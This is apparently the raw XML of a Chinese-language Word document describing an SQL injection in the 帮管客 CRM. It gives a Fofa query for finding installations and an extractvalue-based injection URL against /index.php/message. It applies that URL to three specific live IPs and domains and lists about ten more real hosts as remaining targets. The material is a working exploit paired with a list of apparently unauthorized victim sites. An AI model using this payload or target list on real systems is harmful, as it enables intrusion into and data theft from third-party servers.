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Fofa：app="帮管客-CRM"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3787140"/>
            <wp:effectExtent l="0" t="0" r="952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Url+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/index.php/message?page=1&amp;pai=1%20and%20extractvalue(0x7e,concat(0x7e,(select+user%28%29),0x7e))%23&amp;xu=desc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资产一：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"http://112.19.62.159:8883/"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http://112.19.62.159:8883/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64785" cy="3091180"/>
            <wp:effectExtent l="0" t="0" r="57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http://112.19.62.159:8883/index.php/message?page=1&amp;pai=1%20and%20extractvalue(0x7e,concat(0x7e,(select+user%28%29),0x7e))%23&amp;xu=desc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="27432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资产二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"http://132.145.110.35:8083/"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http://132.145.110.35:8083/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="3093085"/>
            <wp:effectExtent l="0" t="0" r="635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http://132.145.110.35:8083/index.php/message?page=1&amp;pai=1%20and%20extractvalue(0x7e,concat(0x7e,(select+user%28%29),0x7e))%23&amp;xu=desc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2905125"/>
            <wp:effectExtent l="0" t="0" r="762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资产三：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"https://com.cn.zjie.com/"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https://com.cn.zjie.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="508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https://com.cn.zjie.com/index.php/message?page=1&amp;pai=1%20and%20extractvalue(0x7e,concat(0x7e,(select+user%28%29),0x7e))%23&amp;xu=desc</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2799715"/>
            <wp:effectExtent l="0" t="0" r="317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剩余资产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"http://82.156.178.216/"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http://82.156.178.216/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"http://182.92.190.42:1234/"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http://182.92.190.42:1234/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"http://hk.qiqub.com/"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http://hk.qiqub.com/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"http://203.195.208.184:8088/"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http://203.195.208.184:8088/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"http://42.51.49.110:2002/"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http://42.51.49.110:2002/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"http://b.keyikao.com/"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http://b.keyikao.com/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"https://ceshi.yongfuwenhua.com/"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https://ceshi.yongfuwenhua.com/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"http://39.103.171.48:8088/"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http://39.103.171.48:8088/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"http://jianfei.zhaoshihui.com/"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http://jianfei.zhaoshihui.com/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"http://touch.waoqi.com:8088/"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http://touch.waoqi.com:8088/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5F5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styleId="6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2024-04-06T07:22:51Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-06T07:41:26Z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FCEFDDFB1E604980A3E0805730F36838_12</vt:lpwstr>
  </property>
</Properties>
</file>